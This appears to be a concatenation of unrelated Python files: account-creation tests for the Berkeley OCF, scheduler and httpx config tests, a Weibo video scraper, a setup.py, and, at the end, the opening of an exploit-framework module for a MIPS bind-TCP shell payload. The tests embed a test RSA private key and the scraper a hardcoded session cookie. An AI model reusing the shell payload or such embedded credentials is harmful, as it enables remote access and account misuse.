from ocflib.infra.ldap import ldap_ocf
from ocflib.infra.ldap import OCF_LDAP_PEOPLE
WEAK_KEY = dedent(
"""\
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDGkGNFk/yy8HphSvvsmCpMF1vGbJeZXw2AmlLfTLcGJkZuvelu
qJTGepGjeEeML6GrE03dI330mWtnC8jdhmwaELndqoPQ3Ks1eXF5usvDeYoRVir0
ekqJtd2+7eBQ4xrRIA5YohoE31VGQ7ZaQ0GLMuWjldTe3bx+5OJqB0pE5QIDAQAB
AoGAZtTX1GyzbagEeOZwWTLklMt0B+qtCAyl3XgOev4rus+PokJP5bMAeVl4mwPr
aboxK3uv01pSHJ5ndNIxkCfRSzSuKvddfoaDrP97dbS0boqHyJmG38U2kxaMufBP
rFP4a05TajdU9/rQSaGGmTkgDmRfJId5aDfJh6ToKMEYnQECQQDYb0Nj9mAWz5ja
btXyegMespiK1UnyrZlRKsm0zcnEZ4NBE/lgMiJJXkfhdS5af9ORPmDjlQfwuHtZ
N5mEKXNRAkEA6tzQPWCIL3gz0FYVX+l00JTFRIFA1yfvHiF4XjNZUr1TjXdGhto5
DqV39XTk1CPtXNJto9AmNLf8zJD5xsqLVQJAToXnfD/p0rzUpwMpSgSsVxnSsCP7
5TjIdCNC9P7oYgJwI0883YKy38195LVf8OOJfZuVCVyLefFkhxTd9I4ZUQJAO0ft
D/DzrveqLGXuEz18DMHgYQA2+5fK1VIhbbWMUEQVeNmoZZVjXX0KoFwW/izrVsiO
gBCj9B6UopXdVf392QJAcCUgxV6Ca6iWplAKHsaJ7sG+aQOaYI8m3d3MqJ5g34GB
CqXzvT0v5ZrGj+K9dWDb+pYvGWhc2iU/e40yyj0G9w==
-----END RSA PRIVATE KEY-----"""
)
@pytest.fixture
def session(fake_credentials):
engine = create_engine(fake_credentials.mysql_uri)
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)()
@pytest.yield_fixture
def fake_new_account_request(mock_rsa_key):
yield NewAccountRequest(
user_name='someuser',
real_name='Some User',
is_group=False,
calnet_uid=123456,
callink_oid=None,
email='some.user@ocf.berkeley.edu',
encrypted_password=encrypt_password('hunter20000000', RSA.importKey(WEAK_KEY)),
handle_warnings=NewAccountRequest.WARNINGS_WARN,
)
@pytest.yield_fixture
def mock_rsa_key(tmpdir):
test_key = tmpdir.join('test.key')
test_key.write((WEAK_KEY + '\n').encode('ascii'))
yield test_key.strpath
test_key.remove()
class TestFirstAvailableUID:
def test_first_uid(self):
connection = mock.Mock(response=[
{'attributes': {'uidNumber': 999000}},
{'attributes': {'uidNumber': 999200}},
{'attributes': {'uidNumber': 999100}},
])
@contextmanager
def ldap_ocf():
yield connection
with mock.patch('ocflib.account.creation.ldap_ocf', ldap_ocf):
next_uid = _get_first_available_uid()
assert next_uid == 999201
def test_reserved_uid(self):
"""Test that we skip over the reserved UID range of 61184-65535.
"""
connection = mock.Mock(response=[
{'attributes': {'uidNumber': 61183}},
{'attributes': {'uidNumber': 60000}},
])
@contextmanager
def ldap_ocf():
yield connection
with mock.patch('ocflib.account.creation.ldap_ocf', ldap_ocf):
next_uid = _get_first_available_uid()
assert next_uid == 65536
def test_max_uid_constant_not_too_small(self):
"""Test that the _KNOWN_UID constant is sufficiently large.
The way we find the next available UID is very slow because there is no
way to do a query like "find the max UID from all users" in LDAP.
We instead have to find all users and take the max ourselves. This can
take ~15 seconds.
By hardcoding a known min, we just select accounts with uid >
_KNOWN_UID, which is much faster. This makes finding available UIDs
faster the first time a query is made. The result can be cached to make
subsequent attempts even faster.
"""
with ldap_ocf() as c:
c.search(
OCF_LDAP_PEOPLE,
'(uidNumber>={KNOWN_MIN})'.format(KNOWN_MIN=_KNOWN_UID),
attributes=['uidNumber'],
)
num_uids = len(c.response)
if num_uids > 3500:
raise AssertionError((
'Found {} accounts with UID >= {}, you should bump the constant for speed.'
).format(num_uids, _KNOWN_UID))
class TestCreateDirectories:
@mock.patch('subprocess.check_call')
def test_create_home_dir(self, check_call):
create_home_dir('ckuehl')
calls = [mock.call(
['sudo', 'install', '-d', '--mode=0700', '--group=ocf',
'--owner=ckuehl', '/home/c/ck/ckuehl'],
)]
check_call.assert_has_calls(calls)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('subprocess.check_call')
def test_ensure_web_dir(self, check_call, _):
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
def test_ensure_web_dir_existing(self):
with mock.patch('os.path.exists', return_value=True), \
mock.patch('os.path.realpath', return_value='/services/http/users/c/ckuehl'), \
mock.patch('subprocess.check_call') as check_call:
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
def test_ensure_web_dir_rename(self):
with mock.patch('os.path.exists', return_value=True), \
mock.patch('os.path.realpath', return_value='/home/c/ck/ckuehl/public_html'), \
mock.patch('subprocess.check_call') as check_call, \
freeze_time('2015-08-22 14:11:44'):
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', 'mv',
'/home/c/ck/ckuehl/public_html', '/home/c/ck/ckuehl/public_html.08222015-141144'
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
class TestUsernameCheck:
@pytest.mark.parametrize('username', [
'shitup',
'ucbcop',
'suxocf',
])
@mock.patch('ocflib.account.search.user_exists', return_value=False)
def test_warning_names(self, _, username):
"""Ensure that we raise warnings when bad/restricted words appear."""
with pytest.raises(ValidationWarning):
validate_username(username, username)
@pytest.mark.parametrize('username', [
'wordpress',
'systemd',
'ocf',
'ocfrocks',
])
@mock.patch('ocflib.account.search.user_exists', return_value=False)
def test_error_names(self, _, username):
"""Ensure that we raise errors when appropriate."""
with pytest.raises(ValidationError):
validate_username(username, username)
def test_error_user_exists(self):
"""Ensure that we raise an error if the username already exists."""
with pytest.raises(ValidationError):
validate_username('ckuehl', 'Chris Kuehl')
class TestAccountEligibility:
@pytest.mark.parametrize('bad_uid', [
1101587, # good uid, but already has account
9999999999, # fake uid, not in university ldap
])
def test_validate_calnet_uid_error(self, bad_uid):
with pytest.raises(ValidationError):
validate_calnet_uid(bad_uid)
def test_validate_calnet_uid_success(self, mock_valid_calnet_uid):
validate_calnet_uid(9999999999999)
@pytest.mark.skip(reason='Checking for affiliations temp. patched out (ocflib PR 140)')
def test_validate_calnet_affiliations_failure(self, mock_invalid_calnet_uid):
with pytest.raises(ValidationWarning):
validate_calnet_uid(9999999999999)
@pytest.mark.parametrize('affiliations,eligible', [
(['AFFILIATE-TYPE-CONSULTANT'], True),
(['AFFILIATE-TYPE-CONSULTANT', 'AFFILIATE-STATUS-EXPIRED'], False),
(['EMPLOYEE-TYPE-ACADEMIC'], True),
(['EMPLOYEE-TYPE-STAFF'], True),
(['EMPLOYEE-TYPE-ACADEMIC', 'EMPLOYEE-STATUS-EXPIRED'], False),
(['EMPLOYEE-STATUS-EXPIRED', 'AFFILIATE-TYPE-CONSULTANT'], True),
(['EMPLOYEE-STATUS-EXPIRED', 'STUDENT-TYPE-REGISTERED'], True),
(['STUDENT-TYPE-REGISTERED'], True),
(['STUDENT-TYPE-NOT REGISTERED'], True),
(['STUDENT-TYPE-REGISTERED', 'STUDENT-STATUS-EXPIRED'], False),
(['STUDENT-TYPE-NOT REGISTERED', 'STUDENT-STATUS-EXPIRED'], False),
(['STUDENT-STATUS-EXPIRED'], False),
([], False),
])
def test_affiliations(self, affiliations, eligible):
assert eligible_for_account(affiliations) == eligible
class TestSendMail:
FREE_PRINTING_TEXT = 'pages of free printing per semester'
VHOST_TEXT = 'virtual hosting'
@mock.patch('ocflib.account.creation.send_mail')
def test_send_created_mail_individual(self, send_mail, fake_new_account_request):
fake_new_account_request = fake_new_account_request._replace(is_group=False)
send_created_mail(fake_new_account_request)
send_mail.assert_called_once_with(
fake_new_account_request.email,
'[OCF] Your account has been created!',
mock.ANY,
)
body = send_mail.call_args[0][2]
assert self.FREE_PRINTING_TEXT in body
assert self.VHOST_TEXT not in body
@mock.patch('ocflib.account.creation.send_mail')
def test_send_created_mail_group(self, send_mail, fake_new_account_request):
fake_new_account_request = fake_new_account_request._replace(is_group=True)
send_created_mail(fake_new_account_request)
send_mail.assert_called_once_with(
fake_new_account_request.email,
'[OCF] Your account has been created!',
mock.ANY,
)
body = send_mail.call_args[0][2]
assert self.FREE_PRINTING_TEXT not in body
assert self.VHOST_TEXT in body
@mock.patch('ocflib.account.creation.send_mail')
def test_send_rejected_mail(self, send_mail, fake_new_account_request):
send_rejected_mail(fake_new_account_request, 'some reason')
        send_mail.assert_called_once_with(
            fake_new_account_request.email,
            mock.ANY,  # rejection mail subject
            mock.ANY,
        )
class TestPasswordEncryption:
@pytest.mark.parametrize('password', [
'hello world',
'hunter2',
'mock_send_mail_user.assert_called_once_with',
])
def test_encrypt_decrypt_password(self, password, mock_rsa_key):
assert decrypt_password(
encrypt_password(password, RSA.importKey(WEAK_KEY)),
RSA.importKey(WEAK_KEY),
) == password
class TestValidateCallinkOid:
@pytest.mark.parametrize('oid', [0, 123123123])
def test_valid_oid(self, oid):
validate_callink_oid(oid)
@pytest.mark.parametrize('oid', [46130, 46187])
def test_invalid_oid(self, oid):
with pytest.raises(ValidationWarning):
validate_callink_oid(oid)
class TestValidateEmail:
@pytest.mark.parametrize('email', [
'ckuehl@ocf.berkeley.edu',
'somebody@gmail.com',
'herp.derp-hello+something@berkeley.edu',
])
def test_valid_email(self, email):
validate_email(email)
@pytest.mark.parametrize('email', [
'',
'@',
'hello@hello',
'some kinda email@gmail.com',
])
def test_invalid_email(self, email):
with pytest.raises(ValidationError):
validate_email(email)
class TestValidatePassword:
@pytest.mark.parametrize('password', [
'correct horse battery staple',
'pogjpaioshfoasdfnlka;sdfi;sagj',
'ixChytH2GJYBcTZd',
])
def test_valid_password(self, password):
validate_password('ckuehl', password)
@pytest.mark.parametrize('password', [
'',
'simple',
'p@ssw0rd',
'correct horse\nbattery staple',
'correct horse battery staple é',
])
def test_invalid_password(self, password):
with pytest.raises(ValidationError):
validate_password('ckuehl', password)
@pytest.yield_fixture
def fake_credentials(mock_rsa_key):
yield AccountCreationCredentials(
encryption_key=mock_rsa_key,
mysql_uri='sqlite://', # heh
kerberos_keytab='/nonexist',
kerberos_principal='create/admin',
redis_uri='redis://create',
)
@pytest.yield_fixture
def mock_valid_calnet_uid():
with mock.patch(
'ocflib.account.search.user_attrs_ucb',
return_value={'berkeleyEduAffiliations': ['STUDENT-TYPE-REGISTERED']}
):
yield
@pytest.yield_fixture
def mock_invalid_calnet_uid():
with mock.patch(
'ocflib.account.search.user_attrs_ucb',
return_value={'berkeleyEduAffiliations': ['STUDENT-STATUS-EXPIRED']},
):
yield
class TestValidateRequest:
def test_valid_request(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
session,
):
assert validate_request(
fake_new_account_request,
fake_credentials,
session,
) == ([], [])
@pytest.mark.parametrize('attrs', [
{'user_name': 'ckuehl'},
])
def test_invalid_request_error(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
attrs,
session,
):
errors, warnings = validate_request(
fake_new_account_request._replace(**attrs),
fake_credentials,
session,
)
assert errors
def test_invalid_request_already_submitted(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
session,
):
# test where username has already been requested
with mock.patch('ocflib.account.submission.username_pending', return_value=True):
errors, warnings = validate_request(
fake_new_account_request,
fake_credentials,
session,
)
assert errors
# test where this user (calnet/callink oid) has already submitted a request
with mock.patch('ocflib.account.submission.user_has_request_pending', return_value=True):
errors, warnings = validate_request(
fake_new_account_request,
fake_credentials,
session,
)
assert errors
class TestCreateAccount:
@pytest.mark.parametrize('is_group,calnet_uid,callink_oid,expected', [
(False, 123456, None, {'calnetUid': 123456}),
(True, None, 123456, {'callinkOid': 123456}),
])
def test_create(
self,
is_group,
calnet_uid,
callink_oid,
expected,
fake_new_account_request,
fake_credentials
):
with mock.patch('ocflib.account.creation.create_kerberos_principal_with_keytab') as kerberos, \
mock.patch('ocflib.account.creation.get_kerberos_principal_with_keytab',
return_value=None) as kerberos_get, \
mock.patch('ocflib.account.creation.create_ldap_entry') as ldap, \
mock.patch('ocflib.account.creation.create_home_dir') as home_dir, \
mock.patch('ocflib.account.creation.ensure_web_dir') as web_dir, \
mock.patch('ocflib.account.creation.send_created_mail') as send_created_mail, \
mock.patch('ocflib.account.creation._get_first_available_uid', return_value=42) as get_uid, \
mock.patch('ocflib.account.creation.call') as call, \
freeze_time('2015-08-22 14:11:44'):
fake_new_account_request = fake_new_account_request._replace(
is_group=is_group,
calnet_uid=calnet_uid,
callink_oid=callink_oid,
)
new_uid = create_account(
fake_new_account_request,
fake_credentials,
mock.MagicMock(),
known_uid=1,
)
assert new_uid == 42
get_uid.assert_called_once_with(1)
kerberos_get.assert_called_once_with(
fake_new_account_request.user_name,
fake_credentials.kerberos_keytab,
fake_credentials.kerberos_principal,
)
kerberos.assert_called_once_with(
fake_new_account_request.user_name,
fake_credentials.kerberos_keytab,
fake_credentials.kerberos_principal,
password='hunter20000000',
)
ldap.assert_called_once_with(
'uid=someuser,ou=People,dc=OCF,dc=Berkeley,dc=EDU',
dict({
'cn': ['Some User'],
'gidNumber': 1000,
'objectClass': ['ocfAccount', 'account', 'posixAccount'],
'uidNumber': 42,
'homeDirectory': '/home/s/so/someuser',
'loginShell': '/bin/bash',
'ocfEmail': 'someuser@ocf.berkeley.edu',
'mail': ['some.user@ocf.berkeley.edu'],
'userPassword': '{SASL}someuser@OCF.BERKELEY.EDU',
'creationTime': datetime.now(timezone.utc).astimezone(),
}, **expected),
keytab=fake_credentials.kerberos_keytab,
admin_principal=fake_credentials.kerberos_principal,
)
call.assert_called_once_with(('sudo', 'nscd', '-i', 'passwd'))
home_dir.assert_called_once_with(fake_new_account_request.user_name)
web_dir.assert_called_once_with(fake_new_account_request.user_name)
send_created_mail.assert_called_once_with(fake_new_account_request)
|
import unittest
from backend.settings import config, template
class ConfigCorrectTest(unittest.TestCase):
def test_keys_match(self):
self.assertListEqual(list(config.keys()), list(template.keys()),
"Config and its template must have the same keys!")
def test_config_values_filled(self):
config_values = self.__get_nested_dict_values(config)
for val in config_values:
if val is None:
self.fail("Empty values are not allowed in config!")
@staticmethod
def __get_nested_dict_values(d):
for v in d.values():
if isinstance(v, dict):
yield from ConfigCorrectTest.__get_nested_dict_values(v)
else:
yield v
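# Example of what __get_nested_dict_values yields (illustration only):
# {'db': {'host': 'x', 'port': None}} -> 'x', None, so test_config_values_filled
# would fail on the empty port value.
if __name__ == "__main__":
    unittest.main()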
|
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import pytest
import itertools
from syne_tune.optimizer.schedulers.hyperband import HyperbandScheduler
from syne_tune.optimizer.schedulers.fifo import FIFOScheduler
from syne_tune.optimizer.schedulers.synchronous.hyperband_impl import (
SynchronousGeometricHyperbandScheduler,
)
from syne_tune import Tuner
from syne_tune import StoppingCriterion
from syne_tune.config_space import randint
from syne_tune.util import script_checkpoint_example_path
from tst.util_test import temporary_local_backend
_async_parameterizations = list(
itertools.product(
["fifo", "hyperband_stopping", "hyperband_promotion"],
["random", "bayesopt"],
["min", "max"],
)
)
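# The product above expands to 3 schedulers x 2 searchers x 2 modes = 12
# asynchronous test cases.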
@pytest.mark.parametrize("scheduler, searcher, mode", _async_parameterizations)
def test_async_scheduler(scheduler, searcher, mode):
max_steps = 5
num_workers = 2
random_seed = 382378624
config_space = {
"steps": max_steps,
"width": randint(0, 20),
"height": randint(-100, 100),
"sleep_time": 0.001,
}
entry_point = str(script_checkpoint_example_path())
metric = "mean_loss"
trial_backend = temporary_local_backend(entry_point=entry_point)
search_options = {"debug_log": False, "num_init_random": num_workers}
if scheduler == "fifo":
myscheduler = FIFOScheduler(
config_space,
searcher=searcher,
search_options=search_options,
mode=mode,
metric=metric,
random_seed=random_seed,
)
else:
prefix = "hyperband_"
assert scheduler.startswith(prefix)
sch_type = scheduler[len(prefix) :]
myscheduler = HyperbandScheduler(
config_space,
searcher=searcher,
search_options=search_options,
max_t=max_steps,
type=sch_type,
resource_attr="epoch",
random_seed=random_seed,
mode=mode,
metric=metric,
)
stop_criterion = StoppingCriterion(max_wallclock_time=0.2)
tuner = Tuner(
trial_backend=trial_backend,
scheduler=myscheduler,
sleep_time=0.1,
n_workers=num_workers,
stop_criterion=stop_criterion,
)
tuner.run()
_sync_parameterizations = list(
itertools.product(["random", "bayesopt"], ["min", "max"])
)
@pytest.mark.parametrize("searcher, mode", _sync_parameterizations)
def test_sync_scheduler(searcher, mode):
max_steps = 5
num_workers = 2
random_seed = 382378624
config_space = {
"steps": max_steps,
"width": randint(0, 20),
"height": randint(-100, 100),
"sleep_time": 0.001,
}
entry_point = str(script_checkpoint_example_path())
metric = "mean_loss"
trial_backend = temporary_local_backend(entry_point=entry_point)
search_options = {"debug_log": False, "num_init_random": num_workers}
myscheduler = SynchronousGeometricHyperbandScheduler(
config_space,
searcher=searcher,
search_options=search_options,
mode=mode,
metric=metric,
resource_attr="epoch",
max_resource_attr="steps",
random_seed=random_seed,
)
stop_criterion = StoppingCriterion(max_wallclock_time=0.2)
tuner = Tuner(
trial_backend=trial_backend,
scheduler=myscheduler,
sleep_time=0.1,
n_workers=num_workers,
stop_criterion=stop_criterion,
)
tuner.run()
|
# Hot recommendations (the documentary, review and entertainment channels are not included)
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/video/aj/load?ajwvr=6&page=2&type=channel&hot_recommend_containerid=video_tag_15&__rnd=1584096137063'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
print(rectext)
num = re.sub(r'\\n', "", rectext)
num = re.sub(r'\\', "", num)
print(num)
soup = BeautifulSoup(num, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
print(len(list))
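# Note on the decoding below (illustration only): the 'video-sources' attribute is
# percent-encoded twice, so two rounds of unquote are needed, e.g.
# urllib.parse.unquote('http%253A%252F%252Fexample.com') -> 'http%3A%2F%2Fexample.com'
# and a second unquote -> 'http://example.com'.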
for index in range(len(list)):
#soup = BeautifulSoup(list[index], 'html.parser')
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
#q = videosource
imgsrc = list[index].find('img')
imgsrc = imgsrc['src']
title = list[index]['action-data']
str1 = title.find('&title=')
str2 = title.find('&uid=')
title = title[str1+7:str2]
title = urllib.parse.unquote(title,encoding='utf-8',errors='replace')
print(title)
print('http:' + imgsrc[6:])
print('http:' + mp4[0])
print('*******'*30)
# Editor's picks
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=channel&first_level_channel_id=4453781547450385&broadcast_id=4476916414218244'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
print(title.text)
print(img)
print('http:' + mp4[len(mp4)-1])
# Ranking list
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=dayrank'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
title = title.text
title = title.replace(' ', '').replace('\n','')
if len(title) > 40:
title = title[:40] + '...'
print(title)
print(img)
print('http:' + mp4[len(mp4)-1])
# Stories
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=story'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_b')
for index in range(len(list)):
#print(list[index])
if list[index]['action-data'][:9] != 'type=live':
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
like = list[index].find('div',class_='like')
like = like.text
likenum = re.findall(r'\d+',like)
print(str(likenum[0] + '赞'))
print(img)
print('http:' + mp4[len(mp4)-1])
    else:
        # Live-stream entries ('type=live') are skipped; they have no 'video-sources' to parse.
        continue
|
import ssl
import pytest
import httpx
@pytest.mark.asyncio
async def test_load_ssl_config():
ssl_config = httpx.SSLConfig()
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_verify_non_existing_path():
ssl_config = httpx.SSLConfig(verify="/path/to/nowhere")
with pytest.raises(IOError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_verify_existing_file():
ssl_config = httpx.SSLConfig(verify=httpx.config.DEFAULT_CA_BUNDLE_PATH)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_verify_directory():
path = httpx.config.DEFAULT_CA_BUNDLE_PATH.parent
ssl_config = httpx.SSLConfig(verify=path)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_cert_and_key(cert_pem_file, cert_private_key_file):
ssl_config = httpx.SSLConfig(cert=(cert_pem_file, cert_private_key_file))
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
@pytest.mark.parametrize("password", [b"password", "password"])
async def test_load_ssl_config_cert_and_encrypted_key(
cert_pem_file, cert_encrypted_private_key_file, password
):
ssl_config = httpx.SSLConfig(
cert=(cert_pem_file, cert_encrypted_private_key_file, password)
)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_cert_and_key_invalid_password(
cert_pem_file, cert_encrypted_private_key_file
):
ssl_config = httpx.SSLConfig(
cert=(cert_pem_file, cert_encrypted_private_key_file, "password1")
)
with pytest.raises(ssl.SSLError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_cert_without_key_raises(cert_pem_file):
ssl_config = httpx.SSLConfig(cert=cert_pem_file)
with pytest.raises(ssl.SSLError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_no_verify():
ssl_config = httpx.SSLConfig(verify=False)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_NONE
assert context.check_hostname is False
def test_ssl_repr():
ssl = httpx.SSLConfig(verify=False)
assert repr(ssl) == "SSLConfig(cert=None, verify=False)"
def test_timeout_repr():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert repr(timeout) == "TimeoutConfig(timeout=5.0)"
timeout = httpx.TimeoutConfig(read_timeout=5.0)
assert (
repr(timeout)
== "TimeoutConfig(connect_timeout=None, read_timeout=5.0, write_timeout=None)"
)
def test_limits_repr():
limits = httpx.PoolLimits(hard_limit=100)
assert (
repr(limits) == "PoolLimits(soft_limit=None, hard_limit=100, pool_timeout=None)"
)
def test_ssl_eq():
ssl = httpx.SSLConfig(verify=False)
assert ssl == httpx.SSLConfig(verify=False)
def test_timeout_eq():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert timeout == httpx.TimeoutConfig(timeout=5.0)
def test_limits_eq():
limits = httpx.PoolLimits(hard_limit=100)
assert limits == httpx.PoolLimits(hard_limit=100)
def test_timeout_from_tuple():
timeout = httpx.TimeoutConfig(timeout=(5.0, 5.0, 5.0))
assert timeout == httpx.TimeoutConfig(timeout=5.0)
def test_timeout_from_config_instance():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert httpx.TimeoutConfig(timeout) == httpx.TimeoutConfig(timeout=5.0)
|
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs of training')
parser.add_argument('--batch_size', type=int, default=64, help='size of the batches')
parser.add_argument('--lr', type=float, default=0.0002, help='adam: learning rate')
parser.add_argument('--b1', type=float, default=0.5, help='adam: decay of first order momentum of gradient')
parser.add_argument('--b2', type=float, default=0.999, help='adam: decay of first order momentum of gradient')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
parser.add_argument('--latent_dim', type=int, default=100, help='dimensionality of the latent space')
parser.add_argument('--img_size', type=int, default=28, help='size of each image dimension')
parser.add_argument('--channels', type=int, default=1, help='number of image channels')
    parser.add_argument('--sample_interval', type=int, default=400, help='interval between image samples')
args = parser.parse_args()
return args
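if __name__ == '__main__':
    # Quick check of the defaults (sketch; normally parse_args() is imported by the
    # training script): running this module with no flags prints the Namespace with
    # n_epochs=200, batch_size=64, lr=0.0002, etc.
    print(parse_args())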
|
from setuptools import setup
from setuptools import find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name = 'calcmass',
version = '2.0',
description = 'A script to calculate the molecular mass of a chemical compound in g/mol with its chemical formula',
author = 'Manu Kondapaneni',
author_email = 'manukonda11@gmail.com',
url = 'https://github.com/konman2/Mass',
long_description=long_description,
long_description_content_type="text/markdown",
download_url = 'https://github.com/konman2/Mass/archive/2.0.tar.gz',
keywords = ['mass', 'chemical', 'compound','chemistry','element','calculator'],
install_requires=[
'argparse',
],
packages=find_packages(),
entry_points={
'console_scripts': [
'calcmass = calcmass.__main__:main'
],
}
)
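# Usage sketch (illustration only; the exact CLI arguments are defined in
# calcmass.__main__): after `pip install .` the entry point above exposes a
# `calcmass` console command, e.g. `calcmass H2O`, which dispatches to
# calcmass.__main__:main.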
|
from maza.core.exploit import *
from maza.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
BindTCPPayloadMixin,
)
class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "MIPSBE Bind TCP",
